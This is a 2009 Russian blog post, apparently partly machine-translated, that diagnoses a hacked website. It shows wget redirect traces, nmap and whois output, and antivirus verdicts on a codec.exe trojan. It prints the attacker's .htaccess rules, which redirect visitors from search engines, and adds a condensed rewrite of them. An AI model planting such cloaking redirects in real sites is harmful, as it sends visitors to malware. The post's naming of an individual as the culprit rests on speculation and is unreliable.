Нашел в яндексе список сайтов, которые указывают на мой сайт, сайт заражен каким-то хламом
Оттуда он перенаправляется и именно там он появляется в таком случае, что крайне неудобно в моем GNU/Linux/Debian
Если приглядеться, то видно, что он перенаправляет не всех посетителей, а тех, кто пришел с Яндекса, пытается пройти (дом » Новости » Открыть лампа двигатель.) видимо это сделано для заражения только гостей сайта из поисковиков, а обычные посетители и администраторы такую фигню сразу не заметят, скорее всего передача встроена в .htaccess
Я проверяю это с помощью самого безопасного браузера
wget --referer="" -O /dev/null
Обнаружение www.pamparam.net… 78.26.128.55
Подключение к www.pamparam.net|78.26.128.55|:80… Соединение установлено.
HTTP-запрос отправлен, ожидается ответ… 302 Временно отложено
Адрес: [переход]
—2009-06-04 13:58:36—
www.spyware-systems.info… Обнаружен адрес 122.224.5.189
Подключение к www.spyware-systems.info|122.224.5.189|:80… Соединение установлено.
HTTP-запрос отправлен, ожидается ответ… 302 Временно отложено
Адрес: [переход]
—2009-06-04 13:58:36—
Tubepornolive.com обнаружен… 194.165.4.77
Подключение к tubepornolive.com|194.165.4.77|:80… Соединение установлено.
HTTP-запрос отправлен, ожидание ответа… 200 OK
Длина: нет данных [text/html]
Хранится в каталоге: «/dev/null».
[ <=> ] 15 739 44,0 тыс./с при 0,3 с
04.06.2009 13:58:48 (44,0 КБ/с) — «/dev/null» сохранено [15739]
Здесь хорошо видно, что посетители, приходящие с Яндекса, перенаправляются на домен www.spyware-systems.info, смотрим сервер зараженной страницы
wget --no-proxy -S -O /dev/null
Запрос HTTP послан, ожидание ответа...
HTTP/1.1 200 OK
Date: Thu, 04 Jun 2009 10:04:37 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uk28qmlas3ensdpbmqv92u1d76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT nslookup 78.26.128.55
Server: 192.168.0.78
Address: 192.168.0.78#53Non-authoritative answer:
55.128.26.78.in-addr.arpa name = CP.UkrHost.Biz.Authoritative answers can be found from:
128.26.78.in-addr.arpa nameserver = ns.Odessa.TV.
128.26.78.in-addr.arpa nameserver = ns2.Odessa.TV.
ns.Odessa.TV internet address = 78.26.128.46
ns2.Odessa.TV internet address = 78.26.128.47
ns2.Odessa.TV internet address = 78.26.128.41nmap -A pamparam.net
Starting Nmap 4.53 ( ) at 2009-06-04 14:31 MSD
whois www.pamparam.net Registrant:
SCRIPT ENGINE: rpcinfo.nse is not a file.
SCRIPT ENGINE: Aborting script scan.
Interesting ports on CP.UkrHost.Biz (78.26.128.55):
Not shown: 1705 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2rc3
22/tcp open ssh OpenSSH 4.5p1 (FreeBSD 20040419; protocol 2.0)
25/tcp open smtp qmail smtpd
53/tcp open domain
80/tcp open http?
443/tcp open https?
465/tcp open smtps?
587/tcp open submission?
2604/tcp open ospfd?
Service Info: OSs: Unix, FreeBSDN/A
Syava Tregub ([email protected])
Odessa
Odessa
,048
UA
Tel. +7.1231234567Creation Date: 18-Mar-2009
Expiration Date: 18-Mar-2010Administrative Contact:
N/A
Syava Tregub ([email protected])
Odessa
Odessa
,048
UA
Tel. +7.1231234567
Делаем выводы: Сайт в CP1251 означает, что Сева Трегуб пользователь Windows, также он написал CMS на PHP и установил на свой хостинг троян, который заражает своих посетителей пользователям Windows — молодец Сева Трегуб
ДокторВеб онлайн Определяет вложение Codec.exe как
Проверить: codec.exe
Версия ядра антивируса: 5.0.0.12182
Вирусные записи: 559445
Размер файла: 107,00 КБ
Файл MD5: 9f06d7a07ee5398a73931f64ec16c2a5
codec.exe заражен Trojan.Packed.2463
А Касперский онлайн Как
кодек.exe — Trojan-Downloader.Win32.FraudLoad.wbpw
Вот еще один Один пострадавший заразился этой инфекцией gun.ru, но похоже что-то не срослось и мои предположения о mod_rewrite подтвердились
На зараженных сайтах файл .htaccess содержит следующие команды
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteRule .* [R,L]
Удивительно, что взломщик не смог осилить регулярное выражение, такую шнягу можно заменить на 2 строчки
RewriteCond %{HTTP_REFERER} google|msn|yahoo|yandex|rambler|ya|aol [NC,OR]
RewriteRule .* [R,L]
На лице необразованного Вунтузят